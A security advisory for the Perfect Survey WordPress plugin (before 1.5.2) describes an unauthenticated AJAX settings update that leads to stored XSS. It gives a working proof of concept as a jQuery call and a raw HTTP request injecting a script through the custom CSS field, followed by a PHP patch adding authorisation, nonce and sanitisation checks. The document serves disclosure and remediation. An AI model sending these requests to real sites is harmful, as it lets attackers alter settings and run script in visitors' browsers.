WPEX-ID: C73C7694-1CEE-4F26-A425-9C336ADCE52B
History: Oct 05, 2021 - 12:00 a.m.

Perfect Survey < 1.5.2 - Unauthorised AJAX Call to Stored XSS / Survey Settings Update

Published: 2021-10-05 00:00:00
Author: apple502j
Tags: survey, ajax call, stored xss, settings update, exploit, security document

EPSS: 0.001 (percentile 47.1%)

The plugin does not have proper authorisation nor CSRF checks in the save_global_setting AJAX action, allowing unauthenticated users to edit surveys and modify settings. Given the lack of sanitisation and escaping in the settings, this could also lead to a Stored Cross-Site Scripting issue which will be executed in the context of a user viewing any survey.

jQuery.post("https://example.com/wp-admin/admin-ajax.php?action=save_global_setting",{
ps_global_options:{ps_options_custom_css:"body{background-color:blue !important;}</style><script>alert(/XSS/)</script><style>"}
})

POST /wp-admin/admin-ajax.php?action=save_global_setting HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 160
Connection: close

ps_global_options%5Bps_options_custom_css%5D=body%7Bbackground-color%3Ablue+!important%3B%7D%3C%2Fstyle%3E%3Cscript%3Ealert(%2FXSS%2F)%3C%2Fscript%3E%3Cstyle%3E


This will cause all posts with a survey to be rendered blue, along with the XSS alert.
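The fix the advisory implies, written here as an added example rather than the plugin's own code: the save_global_setting handler is registered for logged-in users only, requires the manage_options capability and a nonce, and strips markup from ps_options_custom_css both when saving and when rendering. Apart from the action name and the two POST keys taken from the page, the hook, function, option and nonce names are assumptions.

```php
<?php
// Added example, not the plugin's code. Function, option and nonce names
// ('ps_example_*', 'ps_global_options', 'ps_save_global_setting') are assumed.

// Register for logged-in users only. With no wp_ajax_nopriv_ hook, anonymous
// callers get WordPress's default "0" response and never reach the handler.
add_action( 'wp_ajax_save_global_setting', 'ps_example_save_global_setting' );

function ps_example_save_global_setting() {
    // Authorisation: only users who may manage options can change global settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // CSRF: the request must carry a nonce created with
    // wp_create_nonce( 'ps_save_global_setting' ) in the 'nonce' field.
    check_ajax_referer( 'ps_save_global_setting', 'nonce' );

    $raw = isset( $_POST['ps_global_options'] ) ? wp_unslash( $_POST['ps_global_options'] ) : null;
    if ( ! is_array( $raw ) ) {
        wp_send_json_error( 'bad request', 400 );
    }

    // Allow-list the keys we store instead of saving the whole array.
    $clean = array();
    if ( isset( $raw['ps_options_custom_css'] ) ) {
        $clean['ps_options_custom_css'] = ps_example_sanitize_css( $raw['ps_options_custom_css'] );
    }
    update_option( 'ps_global_options', $clean );
    wp_send_json_success( $clean );
}

// wp_strip_all_tags() removes <script>/<style> blocks and every remaining tag,
// so "body{...}</style><script>alert(/XSS/)</script><style>" collapses to the
// CSS rule alone and can no longer close the <style> element it is printed in.
function ps_example_sanitize_css( $css ) {
    return trim( wp_strip_all_tags( (string) $css ) );
}

// Sanitise again at render time; stored data is not trusted to be clean.
function ps_example_print_custom_css() {
    $opts = get_option( 'ps_global_options', array() );
    if ( empty( $opts['ps_options_custom_css'] ) ) {
        return;
    }
    echo '<style id="ps-custom-css">' . ps_example_sanitize_css( $opts['ps_options_custom_css'] ) . "</style>\n";
}
add_action( 'wp_head', 'ps_example_print_custom_css' );
```

The client-side call then has to be made by an authenticated user and include the nonce, which is what defeats both the unauthorised update and the CSRF variant described above.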

